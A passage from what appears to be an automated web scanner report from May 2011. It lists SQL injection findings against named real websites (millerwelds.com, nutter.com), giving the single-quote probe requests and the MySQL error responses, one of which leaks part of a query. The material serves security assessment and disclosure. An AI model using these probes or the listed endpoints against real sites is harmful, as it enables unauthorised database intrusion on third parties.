...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/images/powerline_bg.png''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png'' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:13:06 GMT
Connection: Keep-Alive
Content-Length: 29451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
2.57. http://www.millerwelds.com/financing/images/powerline_bg.png [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/images/powerline_bg.png

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/images/powerline_bg.png?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:12:40 GMT
Connection: Keep-Alive
Content-Length: 27720

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/images/powerline_bg.png?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:12:41 GMT
Connection: Keep-Alive
Content-Length: 29451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
2.58. http://www.millerwelds.com/financing/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing'/index.php HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:16:42 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 27703

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
2.59. http://www.millerwelds.com/financing/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /financing/index.php' HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:17:06 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B8515BBB2946B5A0577F4A036E8F8BD5; path=/
Content-Length: 27724

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/financing/index.php''' at line 1)<br>
...[SNIP]...
2.60. http://www.millerwelds.com/financing/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /financing/index.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /financing/index.php?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:15:50 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; path=/
Content-Length: 13812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /financing/index.php?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:15:51 GMT
Connection: Keep-Alive
Set-Cookie: X-Mapping-chcfmbmj=B0FC82155C2EC3F1BBBD167B0997AEA7; path=/
Content-Length: 15555

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
2.61. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-bootm-bg.jpg?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:06 GMT
Connection: Keep-Alive
Content-Length: 27711

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...
2.62. http://www.millerwelds.com/images/footer-bootm-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-bootm-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-bootm-bg.jpg'?9 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:30 GMT
Connection: Keep-Alive
Content-Length: 27710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?9'' at line 1)<br>
...[SNIP]...
2.63. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/footer-top-bg.jpg?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:09 GMT
Connection: Keep-Alive
Content-Length: 27709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...
2.64. http://www.millerwelds.com/images/footer-top-bg.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/footer-top-bg.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/footer-top-bg.jpg'?2 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:34 GMT
Connection: Keep-Alive
Content-Length: 27708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?2'' at line 1)<br>
...[SNIP]...
2.65. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images'/header-background.jpg?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:34 GMT
Connection: Keep-Alive
Content-Length: 27713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...
2.66. http://www.millerwelds.com/images/header-background.jpg [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /images/header-background.jpg

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /images/header-background.jpg'?3 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/financing/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __unam=47bc96c-12f69aae8fb-5600ee4c-2; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmv=94003201.|1=Internal%2520Campaign=powerline=1,2=Internal%2520Source=%2Fproducts%2Faccessories%2Finternational%2F=1,3=Internal%2520Medium=bannerad=1,4=Internal%2520Content=blackspace=1,; _chartbeat2=rr9pb9n2shhrzr4o; X-Mapping-chcfmbmj=DCDAE73D9206DA2A75313B243EFAB6EC

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 19:18:58 GMT
Connection: Keep-Alive
Content-Length: 27712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?3'' at line 1)<br>
...[SNIP]...
2.67. http://www.nutter.com/attorneys.php [AttorneyID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /attorneys.php

Issue detail

The AttorneyID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the AttorneyID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /attorneys.php?AttorneyID=59' HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/attorneys.php?letter=G
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:15:26 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 9631

error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>sql: SELECT FirstName,LastName,Mid
...[SNIP]...
